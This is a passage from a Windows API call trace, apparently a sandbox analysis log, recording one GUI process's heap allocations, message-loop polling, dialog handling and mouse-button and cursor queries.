(hWnd=0x60174, nIndex=-21) returned 0 [0259.502] GetCursorPos (in: lpPoint=0x7dfbf0 | out: lpPoint=0x7dfbf0*(x=781, y=507)) returned 1 [0259.502] ScreenToClient (in: hWnd=0x60174, lpPoint=0x7dfbf0 | out: lpPoint=0x7dfbf0) returned 1 [0259.502] GetAsyncKeyState (vKey=1) returned 0 [0259.502] GetAsyncKeyState (vKey=2) returned 0 [0259.502] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.502] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe20220 [0259.502] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc7c8 [0259.502] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32b88 [0259.502] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc7c8 | out: hHeap=0xbc0000) returned 1 [0259.502] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1fe88 [0259.502] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc7c8 [0259.502] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc768 [0259.502] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32bb8 [0259.502] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32bb8 | out: hHeap=0xbc0000) returned 1 [0259.502] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32bb8 [0259.502] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32bb8 | out: hHeap=0xbc0000) returned 1 [0259.502] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc768 | out: hHeap=0xbc0000) returned 1 [0259.502] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32bb8 [0259.503] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x214) returned 0xc073f0 [0259.503] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32b28 [0259.503] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32b78 [0259.503] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc768 [0259.503] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32b78 | out: hHeap=0xbc0000) returned 1 [0259.503] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda260 [0259.503] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda290 [0259.503] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc798 [0259.503] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32b78 [0259.503] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32af8 [0259.503] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc768 | out: hHeap=0xbc0000) returned 1 [0259.503] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32af8 | out: hHeap=0xbc0000) returned 1 [0259.503] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc768 [0259.503] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc7b0 [0259.503] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc7e0 [0259.504] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32af8 [0259.504] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc7e0 | out: hHeap=0xbc0000) returned 1 [0259.504] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32af8 | out: hHeap=0xbc0000) returned 1 [0259.504] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc7b0 | out: hHeap=0xbc0000) returned 1 [0259.504] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.504] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1fe60 [0259.504] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc7b0 [0259.504] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32af8 [0259.504] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32ab8 [0259.504] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32af8 | out: hHeap=0xbc0000) returned 1 [0259.504] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x6) returned 0xe32af8 [0259.504] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x82) returned 0xc0b1e0 [0259.504] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32ac8 [0259.504] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc0b1e0 | out: hHeap=0xbc0000) returned 1 [0259.504] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32ac8 | out: hHeap=0xbc0000) returned 1 [0259.504] CreateAcceleratorTableW (paccel=0xe32af8, cAccel=1) returned 0x500d5 [0259.504] GetForegroundWindow () returned 0x60174 [0259.504] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32af8 | out: hHeap=0xbc0000) returned 1 [0259.504] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32ab8 | out: hHeap=0xbc0000) returned 1 [0259.504] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc7b0 | out: hHeap=0xbc0000) returned 1 [0259.504] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe1fe60 | out: hHeap=0xbc0000) returned 1 [0259.504] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.504] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.504] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32ab8 [0259.504] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32ab8 | out: hHeap=0xbc0000) returned 1 [0259.505] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xe569e0 [0259.505] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.505] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32ab8 [0259.505] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc7b0 [0259.505] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32af8 [0259.505] Sleep (dwMilliseconds=0x0) [0259.513] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc7b0 | out: hHeap=0xbc0000) returned 1 [0259.513] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32af8 | out: hHeap=0xbc0000) returned 1 [0259.513] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32ab8 | out: hHeap=0xbc0000) returned 1 [0259.513] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1fe60 [0259.513] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc7b0 [0259.513] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32ab8 [0259.513] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc7e0 [0259.514] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 1 [0259.514] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.514] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.514] NtdllDialogWndProc_W () returned 0x0 [0259.514] TranslateAcceleratorW (hWnd=0x60174, hAccTable=0x500d5, lpMsg=0x7dfdb4) returned 0 [0259.514] IsDialogMessageW (hDlg=0x60174, lpMsg=0x7dfdb4) returned 1 [0259.514] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.514] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.514] NtdllDialogWndProc_W () returned 0x0 [0259.514] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 1 [0259.514] TranslateAcceleratorW (hWnd=0x60174, hAccTable=0x500d5, lpMsg=0x7dfdb4) returned 0 [0259.514] IsDialogMessageW (hDlg=0x60174, lpMsg=0x7dfdb4) returned 1 [0259.515] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.515] NtdllDialogWndProc_W () returned 0x1 [0259.515] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.515] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.515] GetSysColor (nIndex=15) returned 0xf0f0f0 [0259.515] SetBkColor (hdc=0x200101ed, color=0xf0f0f0) returned 0xffffff [0259.515] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.515] NtdllDialogWndProc_W () returned 0x0 [0259.515] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.515] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.515] GetSysColor (nIndex=15) returned 0xf0f0f0 [0259.515] SetBkColor (hdc=0x200101ed, color=0xf0f0f0) returned 0xf0f0f0 [0259.515] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.515] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.515] GetWindowLongW (hWnd=0x8014a, nIndex=-21) returned 3 [0259.515] NtdllDialogWndProc_W () returned 0x0 [0259.515] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.515] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.516] GetWindowLongW (hWnd=0x8014a, nIndex=-21) returned 3 [0259.516] NtdllDialogWndProc_W () returned 0x0 [0259.516] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.516] NtdllDialogWndProc_W () returned 0x1 [0259.516] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.516] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.516] GetSysColor (nIndex=15) returned 0xf0f0f0 [0259.516] SetBkColor (hdc=0x3d0101d8, color=0xf0f0f0) returned 0xffffff [0259.516] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.516] NtdllDialogWndProc_W () returned 0x0 [0259.516] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.516] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.516] GetSysColor (nIndex=15) returned 0xf0f0f0 [0259.516] SetBkColor (hdc=0x3d0101d8, color=0xf0f0f0) returned 0xf0f0f0 [0259.517] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.517] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.517] GetWindowLongW (hWnd=0x8014a, nIndex=-21) returned 3 [0259.517] NtdllDialogWndProc_W () returned 0x0 [0259.517] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.517] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.517] GetWindowLongW (hWnd=0x8014a, nIndex=-21) returned 3 [0259.517] NtdllDialogWndProc_W () returned 0x0 [0259.517] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 1 [0259.517] TranslateAcceleratorW (hWnd=0x60174, hAccTable=0x500d5, lpMsg=0x7dfdb4) returned 0 [0259.517] TranslateMessage (lpMsg=0x7dfdb4) returned 0 [0259.517] DispatchMessageW (lpMsg=0x7dfdb4) returned 0x0 [0259.517] GetForegroundWindow () returned 0x60174 [0259.517] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.518] GetCursorPos (in: lpPoint=0x7dfbf0 | out: lpPoint=0x7dfbf0*(x=535, y=543)) returned 1 [0259.518] ScreenToClient (in: hWnd=0x60174, lpPoint=0x7dfbf0 | out: lpPoint=0x7dfbf0) returned 1 [0259.518] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x24) returned 0xdeda80 [0259.518] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda470 [0259.518] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32af8 [0259.518] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32ac8 [0259.518] GetAsyncKeyState (vKey=1) returned 0 [0259.518] GetAsyncKeyState (vKey=2) returned 0 [0259.518] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.518] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.518] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.518] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.518] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.518] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.518] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.518] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.518] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.518] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xe56a20 [0259.518] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.518] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe56a20 | out: hHeap=0xbc0000) returned 1 [0259.518] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.518] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.519] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.519] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.519] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.519] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda1d0 [0259.519] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32a98 [0259.519] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32ac8 | out: hHeap=0xbc0000) returned 1 [0259.519] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda470 | out: hHeap=0xbc0000) returned 1 [0259.519] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32af8 | out: hHeap=0xbc0000) returned 1 [0259.519] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdeda80 | out: hHeap=0xbc0000) returned 1 [0259.519] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda1d0 | out: hHeap=0xbc0000) returned 1 [0259.519] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a98 | out: hHeap=0xbc0000) returned 1 [0259.519] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.519] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.519] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.519] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.519] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.519] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.519] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.519] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.519] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.519] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.519] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xe56a20 [0259.519] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.519] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe56a20 | out: hHeap=0xbc0000) returned 1 [0259.519] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.520] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.520] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.520] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.520] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.520] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda1d0 [0259.520] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32a98 [0259.520] Sleep (dwMilliseconds=0x0) [0259.524] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda1d0 | out: hHeap=0xbc0000) returned 1 [0259.524] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a98 | out: hHeap=0xbc0000) returned 1 [0259.524] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.524] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.524] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.524] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.524] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.524] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.524] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.524] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.524] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.524] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.524] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xe56a20 [0259.525] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.525] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe56a20 | out: hHeap=0xbc0000) returned 1 [0259.525] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.525] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.525] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.525] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.525] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.525] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda1d0 [0259.525] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32a98 [0259.526] Sleep (dwMilliseconds=0x0) [0259.526] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda1d0 | out: hHeap=0xbc0000) returned 1 [0259.526] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a98 | out: hHeap=0xbc0000) returned 1 [0259.526] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.526] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.526] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.526] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.527] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.527] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.527] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.527] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.527] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.527] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.527] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xe56a20 [0259.527] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.527] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe56a20 | out: hHeap=0xbc0000) returned 1 [0259.527] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.527] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.527] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.527] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.527] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.527] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda1d0 [0259.527] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32a98 [0259.527] Sleep (dwMilliseconds=0x0) [0259.527] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda1d0 | out: hHeap=0xbc0000) returned 1 [0259.527] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a98 | out: hHeap=0xbc0000) returned 1 [0259.527] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.527] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.527] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.527] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.527] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.528] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.528] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.528] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.528] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.528] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.528] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xe56a20 [0259.528] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.528] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe56a20 | out: hHeap=0xbc0000) returned 1 [0259.528] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.528] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.528] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.528] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.528] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.528] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda1d0 [0259.528] 